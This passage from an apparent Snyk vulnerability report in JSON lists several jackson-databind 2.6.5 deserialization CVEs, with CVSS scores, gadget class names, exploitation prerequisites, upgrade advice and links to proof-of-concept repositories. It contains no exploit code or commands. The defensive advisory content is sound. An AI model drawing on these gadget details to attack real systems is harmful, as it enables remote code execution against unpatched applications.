deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36184" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:02:15.197495Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.700251Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.214306Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.757857Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.695573Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36186" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:05:16.831143Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:00:26Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.206083Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.695573Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.249724Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.867743Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.705041Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36180" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:08:29.105792Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:05:51Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:24.705041Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056419", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3003", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.268380Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:18.170866Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.831271Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.docx4j.org.apache.xalan.lib.sql.JNDIConnectionPool`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3003)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36183" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:11:36.206859Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:10:25Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34.627750Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.831271Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056420", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/Al1ex/CVE-2020-36179", - "title": "Al1ex's Poc" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/3004", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.319616Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:59.448286Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.759947Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.72318", - "probability": "0.00357", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36179" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T13:29:22.463416Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T13:12:59Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:34Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.759947Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056421", - "title": "Deserialization of Untrusted Data", - "CVSSv3": 